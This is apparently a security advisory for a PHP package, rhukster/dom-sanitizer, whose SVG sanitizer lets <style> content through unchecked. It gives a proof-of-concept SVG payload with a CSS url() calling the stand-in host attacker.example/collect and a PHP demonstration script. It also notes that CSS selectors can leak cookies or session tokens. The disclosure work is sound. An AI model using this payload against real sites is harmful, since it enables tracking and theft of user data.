DOMSanitizer::sanitize() allows <style> elements in SVG content but never inspects their text content. CSS url() references and @import rules pass through unfiltered, causing the browser to issue HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered.
In src/DOMSanitizer.php, 'style' is listed in the SVG allowed-tag array (line 31). The sanitize() method (lines 111–133) removes disallowed tags and strips attributes matching the EXTERNAL_URL pattern — but text node content of <style> elements is never examined. Because CSS rules live in text nodes, EXTERNAL_URL filtering never applies to them.
Vulnerable code (src/DOMSanitizer.php, line 31):
'svg' => ['style', 'path', 'rect', 'circle', ...],
The following payload survives sanitize() intact:
<svg xmlns="http://www.w3.org/2000/svg">
<style>* { background: url(https://attacker.example/collect); }</style>
</svg>
<?php
require 'vendor/autoload.php';
use Rhukster\DomSanitizer\DOMSanitizer;
$svg = '<svg xmlns="http://www.w3.org/2000/svg"><style>* { background: url(https://attacker.example/collect); }</style></svg>';
$sanitizer = new DOMSanitizer(DOMSanitizer::SVG);
$output = $sanitizer->sanitize($svg);
echo $output; // <style> with url() survives unchanged — confirmed exploitable in Statamic CMS (GHSA-g8hv-8w5p-cvqg)
Render the returned string in a browser. The browser sends a GET request to https://attacker.example/collect.
Any application that passes user-controlled SVG through DOMSanitizer::sanitize() and renders the output in a browser is vulnerable. An attacker can exfiltrate the page URL to an external server, load arbitrary external stylesheets, and on some browsers leverage CSS attribute selectors + url() to exfiltrate cookie or session token values.
| Score | Percentile |
|---|---|
| 0.03% | 9.03% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 4.7 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-93vf-569f-22cq ↗ |
| CVE | CVE-2026-40301 ↗ |
| CWE id | Name |
|---|---|
| CWE-79 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| composer | rhukster/dom-sanitizer | < 1.0.10 | 1.0.10 | — |